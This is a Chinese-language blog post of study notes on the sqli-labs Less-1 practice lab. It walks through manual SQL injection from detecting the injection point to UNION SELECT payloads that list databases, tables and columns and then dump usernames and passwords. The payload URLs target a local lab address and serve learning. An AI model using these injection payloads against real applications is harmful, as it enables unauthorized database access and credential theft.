• 读书笔记--第三章


    第三章将的就是靶场的实验:靶场+工具+手工

    0x01  sqli-Less1

    1.判断SQL注入

    手工判断是否存在注入点(加 ’ ,出现错误提示则可能存在注入漏洞)→判断类型(数字型or字符型)

    (搜索型注入:搜索页面搜索:% 、‘ % & 等特殊字符,如果存在则可能存在漏洞)

     2.存在漏洞,且为字符型

     3.猜字段数

    http://192.168.5.128/sqli/Less-1/?id=1' order by 3--+ #不报错 字段数为3

     4.联合查询字段数

    http://192.168.5.128/sqli/Less-1/?id=1' and 1=2 union select 1,2,3--+

     5.查看所有数据库名

    http://192.168.5.128/sqli/Less-1/
    ?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

    6. 查询security内所有表名

    http://192.168.5.128/sqli/Less-1/
    ?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

    7.爆破security里面的user表中的列名,然后爆出用户名和密码

    union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+
    http://192.168.5.128/sqli/Less-1/
    ?id=1' and 1=2 union select 1,(select group_concat(password) from security.users),(select group_concat(username)from security.users)--+

  • 相关阅读:
    java中的CAS
    浅谈尾递归
    LeetCode 第 222 场周赛
    LeetCode 第 216 场周赛
    C++代码整洁之道
    LeetCode 第 211 场周赛
    LeetCode 每日一题 51.N 皇后
    LeetCode 第 201 场周赛
    LeetCode 第 32 场双周赛
    [转]演讲实录丨DevOps之十倍速原则
  • 原文地址:https://www.cnblogs.com/TEAM0N/p/14282336.html
Copyright © 2020-2023  润新知